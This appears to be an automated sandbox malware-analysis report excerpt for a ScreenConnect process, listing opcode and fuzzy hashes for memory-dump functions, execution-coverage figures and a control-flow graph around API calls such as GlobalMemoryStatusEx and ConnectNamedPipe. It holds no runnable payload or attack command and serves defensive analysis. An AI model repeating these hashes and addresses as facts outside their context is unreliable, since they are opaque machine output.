                                                                      • Opcode ID: 283618090652bc341ac45fc696ce822da615294ce5e806eb287ff9e7d72f0a38
                                                                      • Instruction ID: 1dea689aabd7570597c03ad290117259c8cb6bce073f64a288ad4c3670b9d68d
                                                                      • Opcode Fuzzy Hash: 283618090652bc341ac45fc696ce822da615294ce5e806eb287ff9e7d72f0a38
                                                                      • Instruction Fuzzy Hash: 7001D413FEDA890BEBE9656C39161F81BD98F95221F4800B7EA5CC61A6ED0D5C864382
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c0381cb262bbe9909de1b088a67481b2d18bc575c9a4adb3de82bf75d66972d4
                                                                      • Instruction ID: e9d54e011df20a4a61ba9cd85da76e8a6f6e13693107cf0b5fe20a384ec3ea59
                                                                      • Opcode Fuzzy Hash: c0381cb262bbe9909de1b088a67481b2d18bc575c9a4adb3de82bf75d66972d4
                                                                      • Instruction Fuzzy Hash: 6701F726FACA5746FBBCB22D40903B964C7EF84341F19813AD42EC21F5DD2C9C818340
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: adce3ef2d1c1d769986d46d713ac112729efb2912fba996e2cb7408d8d11b6b6
                                                                      • Instruction ID: 25b256887c948a2a0fffabc8c799f5837246bf0139f49b1429625d6a6a60c9c9
                                                                      • Opcode Fuzzy Hash: adce3ef2d1c1d769986d46d713ac112729efb2912fba996e2cb7408d8d11b6b6
                                                                      • Instruction Fuzzy Hash: 04013132BAD54B49EFBDEA1D40A06B812E9AF55305F44147CD86ECE1E7CE1CF8058311
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a4ad8919dcfcd131e70aeaf28edb384539a0c79584f7641546103c23bf65b073
                                                                      • Instruction ID: f78713f12036a0a0ac0bea86ee5f6bf0a1ab3f6f9df8a288fd6e502683857c9f
                                                                      • Opcode Fuzzy Hash: a4ad8919dcfcd131e70aeaf28edb384539a0c79584f7641546103c23bf65b073
                                                                      • Instruction Fuzzy Hash: C1F0313184D1695FCB01BB78A4615D97BF4DF06358B0C41E7E05C8E463EE25A449C789
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 35c431fc73cc6136eb5a41ae4303875bc3960c9e3178d77709bdf9082c49e022
                                                                      • Instruction ID: d5fffdfc2398c027107db8fffa06e1b295d62efcda922fbfc8a4091a440c52d5
                                                                      • Opcode Fuzzy Hash: 35c431fc73cc6136eb5a41ae4303875bc3960c9e3178d77709bdf9082c49e022
                                                                      • Instruction Fuzzy Hash: 0FF0F622B9CA994FDB68E21C44407F973E4EF55341F8400BBD04EC21D3CD28A8078341
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 242b6a21a9e6bc0611cc0e31751ac192e01bcbd33a9c01cd861caf0d3090ee2b
                                                                      • Instruction ID: ba96ebb8fa40aa1220ba2c6b2d76424f2088e5eb026db8c5486cccff062e88b1
                                                                      • Opcode Fuzzy Hash: 242b6a21a9e6bc0611cc0e31751ac192e01bcbd33a9c01cd861caf0d3090ee2b
                                                                      • Instruction Fuzzy Hash: 49F0273339DBC50BE778EA7CAC420B5B7C4EB42271B440A7EC5E9874A3E506F4568345
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 561dc923716689bafbf406bac2b7c3b300f124a46c465a69b532484199eea055
                                                                      • Instruction ID: 13751a5ca70ec0384375b2c2d712d5ed2279e5c325b2745b18f5fca15f994c6d
                                                                      • Opcode Fuzzy Hash: 561dc923716689bafbf406bac2b7c3b300f124a46c465a69b532484199eea055
                                                                      • Instruction Fuzzy Hash: BFF02B22A1D7840FD3A6826C28595713FA2DF9B12175D02F7D408C72B7DD089C068391
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3d20562d0616ee88b95fb64c146f221931bee722e1401a8a6aba126e376c0b32
                                                                      • Instruction ID: f4edd4661bedcc495a504dda6997d060a7531f48584c87e5714c88a84aeddeca
                                                                      • Opcode Fuzzy Hash: 3d20562d0616ee88b95fb64c146f221931bee722e1401a8a6aba126e376c0b32
                                                                      • Instruction Fuzzy Hash: 46F030357AC54A4EEFB9DE1C40907F422C5FB99344FA40174C81DD72DACE28EC058751
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 841bc522be66baf4c17bf6477564fe4a6893699112b0a73cbd715bbd29d4e8a6
                                                                      • Instruction ID: dea3696373e85d9a0f71ad97885137fdbf67c99fcf401aa6ea74573600acbe7a
                                                                      • Opcode Fuzzy Hash: 841bc522be66baf4c17bf6477564fe4a6893699112b0a73cbd715bbd29d4e8a6
                                                                      • Instruction Fuzzy Hash: 59F090329587494FD7066B38C4561AA7BB5FF55204BA804FBE409C76A3EE2CD909C781
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 729acf5900bc75a67dd5ae69c17ebcc57c4498ac317295677c771e2b6ad07e19
                                                                      • Instruction ID: 2fbaa1b700412df81395191760d140fcff90262912a48af1ebd50f6b6216ab1e
                                                                      • Opcode Fuzzy Hash: 729acf5900bc75a67dd5ae69c17ebcc57c4498ac317295677c771e2b6ad07e19
                                                                      • Instruction Fuzzy Hash: 7CF0F93066894A8FDF98EF18C490E6573A5FF6834476444E9D45EDB2A6CA25E802CB40
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c50a6c276adf9015e41f559284052f5a5388e4890084166fb1513fa49d406150
                                                                      • Instruction ID: 483480062db014e41139a3937da3b0f25556fd8e0bf81ccc0aee47ca86b1d85c
                                                                      • Opcode Fuzzy Hash: c50a6c276adf9015e41f559284052f5a5388e4890084166fb1513fa49d406150
                                                                      • Instruction Fuzzy Hash: 95F0A7316189484FD784DA18D4647B573D1EF99354B5401B9C45EC72A5CF26AC42C740
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 600e318dc060802b21a48a75e6cb16835c62cfbfee9fa3e6155201dab6faa97e
                                                                      • Instruction ID: 5701b0970cce2916ef715f76dda2c7f1d708ff98e935b3282827d9426d38f6f0
                                                                      • Opcode Fuzzy Hash: 600e318dc060802b21a48a75e6cb16835c62cfbfee9fa3e6155201dab6faa97e
                                                                      • Instruction Fuzzy Hash: A0F0A03A54C6CC4FCB4ADB68D4558D5BFB0FF06320B0401DBE088CB063E7209A49CB82
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 23640876fcec1e394cfa9632c69801dd14df7611b0e34b0582f28810ca54728d
                                                                      • Instruction ID: ceb82a0afdffbe629484c2ac81ebd4e2e86a2549d975d3c019c0c4b4ab0675bb
                                                                      • Opcode Fuzzy Hash: 23640876fcec1e394cfa9632c69801dd14df7611b0e34b0582f28810ca54728d
                                                                      • Instruction Fuzzy Hash: 0EF0DA316589498FDF98EF18C494E6573E5FF6834476440E8C45ECB296CA36E802CB40
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 174e0ac5674f6d823ca48fa1ff43d8b5cf0d8eaa335cdcac523242de0e9153c7
                                                                      • Instruction ID: 08c9597fc86df699b557e27f2db1ac1c523b27a63cf66269466c563d52682d00
                                                                      • Opcode Fuzzy Hash: 174e0ac5674f6d823ca48fa1ff43d8b5cf0d8eaa335cdcac523242de0e9153c7
                                                                      • Instruction Fuzzy Hash: 2AE0D83154E3D50FDB569B3884D88E13FA0EE2722030940FBD585CF0B3E919854AC781
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1e123f6c1b71ebfbef0250704d63d626cdfc4719e9fc24b802d8c23405a34c6c
                                                                      • Instruction ID: bd023a9eff7be88c228d16c64b4a28a905f70cb6ed1d75f829c3627f23e91ad3
                                                                      • Opcode Fuzzy Hash: 1e123f6c1b71ebfbef0250704d63d626cdfc4719e9fc24b802d8c23405a34c6c
                                                                      • Instruction Fuzzy Hash: F1E02231798A084FDB98EE2CE8046A473F8EF94361B94087AD808C3174CA2A9882C300
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d7fdefdfff3dec0f4aec02b04848ddcfec1711c53200454e62dec048ac30cef2
                                                                      • Instruction ID: 9c7143d81fa7e15a5883b9ecb570478fd51f7701f6331f426a43dfaac45f34f7
                                                                      • Opcode Fuzzy Hash: d7fdefdfff3dec0f4aec02b04848ddcfec1711c53200454e62dec048ac30cef2
                                                                      • Instruction Fuzzy Hash: D2F0AC346189098FDF98DF0CC094B6533E2FF6830472441E9C41ECB296CA36EC42CB40
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 455b307951b279fc26e521799a905e101ae45853ef75b0c9d7ebc1f1ba91cfc6
                                                                      • Instruction ID: 0aa3f00f86ffcd07a287ff9177cf7266e70cc46011ef7bca8de4307ec14b94ca
                                                                      • Opcode Fuzzy Hash: 455b307951b279fc26e521799a905e101ae45853ef75b0c9d7ebc1f1ba91cfc6
                                                                      • Instruction Fuzzy Hash: 20E09A32B5C2040AF71D9B08A4033F8A3D1EB86220F00007AD14A96A93EA2AA4578381
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cc63ea1fe2be45baff16c250ee7cc2cc50cd6d44585f75b95397a78bb96b1aca
                                                                      • Instruction ID: 172ff92d82e3786b4bad0c3e3b45760fb6423da0a710db825ff1f0b1affd026d
                                                                      • Opcode Fuzzy Hash: cc63ea1fe2be45baff16c250ee7cc2cc50cd6d44585f75b95397a78bb96b1aca
                                                                      • Instruction Fuzzy Hash: 88F059346149088FDF98EF1CC094B6577E2FFA830472441ADD45EDB296CA32EC42CB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a07ef638e115f6beeb6b032bd8472689f1c5eaa74430dd96c94cd6ea39cab1a1
                                                                      • Instruction ID: cf9543b76bd474d795570fb2c6fdd7034b02cd3570c4162b27da8e9f30ae2c30
                                                                      • Opcode Fuzzy Hash: a07ef638e115f6beeb6b032bd8472689f1c5eaa74430dd96c94cd6ea39cab1a1
                                                                      • Instruction Fuzzy Hash: EAE01212F7DE5E4FABF966BC001923960C5EF58651B940575981EC33A1ED18EC024340
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ed69539ab3073f3c59eab23124682eb945f8aa65ddeb29e409f99d1f65c9ff31
                                                                      • Instruction ID: 4758711f5d112f956dd7522e776677c796b6371e5c7efe94e44bf44d80c096b4
                                                                      • Opcode Fuzzy Hash: ed69539ab3073f3c59eab23124682eb945f8aa65ddeb29e409f99d1f65c9ff31
                                                                      • Instruction Fuzzy Hash: 2AE08620B7894A4BCF98EA2C8050AA533E5FB58384B5440B5D40DC7285CE24EC018780
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 963de00168b2e636846f12da55dd2d6f24fcc85cb7a7261f8dbf5ca9e1f07579
                                                                      • Instruction ID: 462aac5b6a1f580c6ab38b5b3f76376c1b4cedc1f0abe14c9348651ef26186b0
                                                                      • Opcode Fuzzy Hash: 963de00168b2e636846f12da55dd2d6f24fcc85cb7a7261f8dbf5ca9e1f07579
                                                                      • Instruction Fuzzy Hash: 8BD0A73375481C4FDB58D74CA8007E873D0EF84315F410075D12EC3191CB3498598740
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1bcd1009c7817e3cdead83c439636c333808fde0513783d37c9b0db436efca92
                                                                      • Instruction ID: 8b3c06fa474463e66241d5c7920cd9e336ef1fcceb96188753ea849689c5005a
                                                                      • Opcode Fuzzy Hash: 1bcd1009c7817e3cdead83c439636c333808fde0513783d37c9b0db436efca92
                                                                      • Instruction Fuzzy Hash: B6D0A731B58C4C4B9FDCDB0864105FC33D9EF88304F800064E81DD3281DE24A811D700
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 00abb11d66311089e5564989e7a8d72bad23a65a1e710e3ceefcb93b47af2045
                                                                      • Instruction ID: 397289da0204d7a2817fb0f0fc23e8b6fe26341c035bdc030e4bef27be2fb673
                                                                      • Opcode Fuzzy Hash: 00abb11d66311089e5564989e7a8d72bad23a65a1e710e3ceefcb93b47af2045
                                                                      • Instruction Fuzzy Hash: 2ED05B11ABC98B4AE358EB6C88515BE71D9EF94304F944479911FC31A7CC38F4059741
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d6a330c05f7fcbd579455b0adc103a6fb1cfd3f77c237790879268b3196f72f1
                                                                      • Instruction ID: 98aa41691fe09d38d5238325b0f4b3397dcf44196428d028d20a839b040b7bd0
                                                                      • Opcode Fuzzy Hash: d6a330c05f7fcbd579455b0adc103a6fb1cfd3f77c237790879268b3196f72f1
                                                                      • Instruction Fuzzy Hash: 40C01202368A890EF699B22C20293B81AC78BD82A0B2A007BC41DC72A7CC4C08830361
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e7e6fae2b802d571a119f607bd876e2075493d58e791f445ca3a8db14776a6b0
                                                                      • Instruction ID: fede2395e0b5576c420f70b5437933955810fb32c819e9006a1d6e83fe40a4a7
                                                                      • Opcode Fuzzy Hash: e7e6fae2b802d571a119f607bd876e2075493d58e791f445ca3a8db14776a6b0
                                                                      • Instruction Fuzzy Hash: 46C002313588199FDF94FF2DC099F2937E2EB6834132545B5A41DCB2B6CA24EC45CB04
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 43225bdc362b29dce39ad66f6ab73f6f57ddc0c173ab0eb189f5fd2b9d930eee
                                                                      • Instruction ID: 5c09901f666a718308974bb2946dd3c9a9f8a4988b827b2a0afa6772acc85f9b
                                                                      • Opcode Fuzzy Hash: 43225bdc362b29dce39ad66f6ab73f6f57ddc0c173ab0eb189f5fd2b9d930eee
                                                                      • Instruction Fuzzy Hash: BCC01221B68E4A4EA368DF1C845027921E6AF98200B60453A911DC22A6CD38A5019781
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8e787c4442e4c5cdc28f3827105d2cbd5a0596150a60c36a4228e1db99a8e625
                                                                      • Instruction ID: 6d70fce2cbc817ca077ca5e0ba78a7d46e6289c520bf710890c131f779d6a152
                                                                      • Opcode Fuzzy Hash: 8e787c4442e4c5cdc28f3827105d2cbd5a0596150a60c36a4228e1db99a8e625
                                                                      • Instruction Fuzzy Hash: 6BC08043EAF9C347F327123D0C1116C68484F11504F1C40BDE0955F1E3DE189C05535B
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2617111229.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffe7cfc0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dd081ecb625be2a4f126510605a50ff8d0af7959866c98ca3d622251ca3a0a0e
                                                                      • Instruction ID: 3b8e5764f4fdc6515e5f686cf22e8fd2fb6838380e7816abf0fd0bf59718d17b
                                                                      • Opcode Fuzzy Hash: dd081ecb625be2a4f126510605a50ff8d0af7959866c98ca3d622251ca3a0a0e
                                                                      • Instruction Fuzzy Hash: 84C0127080C6698FCB45AF2888080B93AB8EB293017200C9AA114D3292DA74C481CB00

                                                                      Execution Graph

                                                                      Execution Coverage:14.2%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:13
                                                                      Total number of Limit Nodes:2
                                                                      execution_graph 5366 7ffe7cc9804c 5368 7ffe7cc9806d 5366->5368 5367 7ffe7cc98082 5368->5367 5369 7ffe7cc980f6 SetProcessMitigationPolicy 5368->5369 5370 7ffe7cc98152 5369->5370 5361 7ffe7cfa8fe4 5365 7ffe7cfa8fed 5361->5365 5362 7ffe7cfa9189 GlobalMemoryStatusEx 5364 7ffe7cfa91b5 5362->5364 5363 7ffe7cfa90e2 5365->5362 5365->5363 5371 7ffe7cc93662 5372 7ffe7ccb65e0 ConnectNamedPipe 5371->5372 5374 7ffe7ccb6692 5372->5374

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 7ffe7cfa8fe4-7ffe7cfa8feb 1 7ffe7cfa8ff6-7ffe7cfa9028 0->1 2 7ffe7cfa8fed-7ffe7cfa8ff5 0->2 4 7ffe7cfa902b 1->4 2->1 4->4 5 7ffe7cfa902d-7ffe7cfa9049 4->5 7 7ffe7cfa904d-7ffe7cfa905a 5->7 8 7ffe7cfa904b 5->8 10 7ffe7cfa905c-7ffe7cfa9085 7->10 11 7ffe7cfa90a4 7->11 8->7 8->8 13 7ffe7cfa9087-7ffe7cfa908a 10->13 14 7ffe7cfa90de 10->14 11->11 12 7ffe7cfa90a6-7ffe7cfa90b7 11->12 21 7ffe7cfa9128-7ffe7cfa9129 12->21 22 7ffe7cfa90b9-7ffe7cfa90bd 12->22 16 7ffe7cfa908c-7ffe7cfa908e 13->16 17 7ffe7cfa910b-7ffe7cfa910f 13->17 18 7ffe7cfa90df 14->18 23 7ffe7cfa910a 16->23 24 7ffe7cfa9090 16->24 41 7ffe7cfa9110 17->41 19 7ffe7cfa915b-7ffe7cfa915e 18->19 20 7ffe7cfa90e0 18->20 25 7ffe7cfa9161-7ffe7cfa9187 19->25 20->25 26 7ffe7cfa90e1 20->26 27 7ffe7cfa912d-7ffe7cfa913c 21->27 28 7ffe7cfa912b 21->28 29 7ffe7cfa913e-7ffe7cfa913f 22->29 30 7ffe7cfa90bf-7ffe7cfa90c1 22->30 23->17 32 7ffe7cfa9092-7ffe7cfa9094 24->32 33 7ffe7cfa90d3 24->33 34 7ffe7cfa9189-7ffe7cfa91b3 GlobalMemoryStatusEx 25->34 35 7ffe7cfa90e2-7ffe7cfa9109 26->35 36 7ffe7cfa9123-7ffe7cfa9127 26->36 38 7ffe7cfa913d 27->38 28->27 28->28 29->34 40 7ffe7cfa9140-7ffe7cfa9141 29->40 30->38 39 7ffe7cfa90c3-7ffe7cfa90c7 30->39 32->41 44 7ffe7cfa9096 32->44 42 7ffe7cfa914f-7ffe7cfa9153 33->42 43 7ffe7cfa90d5 33->43 46 7ffe7cfa91bb-7ffe7cfa91e2 34->46 47 7ffe7cfa91b5 34->47 35->23 36->21 38->29 48 7ffe7cfa90c9 39->48 49 7ffe7cfa9143-7ffe7cfa9148 39->49 40->49 52 7ffe7cfa9155-7ffe7cfa915a 42->52 50 7ffe7cfa90d6-7ffe7cfa90d7 43->50 51 7ffe7cfa9117-7ffe7cfa9119 43->51 53 7ffe7cfa9098-7ffe7cfa909a 44->53 54 7ffe7cfa90d9 44->54 47->46 48->17 56 7ffe7cfa90cb-7ffe7cfa90cd 48->56 57 7ffe7cfa9149-7ffe7cfa914e 49->57 50->54 58 7ffe7cfa911b-7ffe7cfa911e 51->58 59 7ffe7cfa911f 51->59 52->19 60 7ffe7cfa9116 53->60 61 7ffe7cfa909c 53->61 54->52 62 7ffe7cfa90db-7ffe7cfa90dd 54->62 56->57 63 7ffe7cfa90cf-7ffe7cfa90d1 56->63 57->42 58->59 65 7ffe7cfa9120-7ffe7cfa9121 59->65 66 7ffe7cfa9122 59->66 60->51 61->18 64 7ffe7cfa909e-7ffe7cfa90a1 61->64 62->14 63->33 64->65 67 7ffe7cfa90a3 64->67 65->66 66->36 67->11
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1472002499.00007FFE7CFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFA0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ffe7cfa0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemoryStatus
                                                                      • String ID: H
                                                                      • API String ID: 1890195054-2852464175
                                                                      • Opcode ID: 2b3efa1d4b795f1418f55220976fdf4d41c14f8122c6b0526ec434e94a2897b4
                                                                      • Instruction ID: df6d6a67e276b943ef2a7200f43df33b2c990b26308fbc0a70176d929378fb65
                                                                      • Opcode Fuzzy Hash: 2b3efa1d4b795f1418f55220976fdf4d41c14f8122c6b0526ec434e94a2897b4
                                                                      • Instruction Fuzzy Hash: 2B81463285C6C94FE769C76C8C096ADBFE4EF53320F0D41BAC06CC75A3DA59690A8741

                                                                      Control-flow Graph

                                                                      APIs
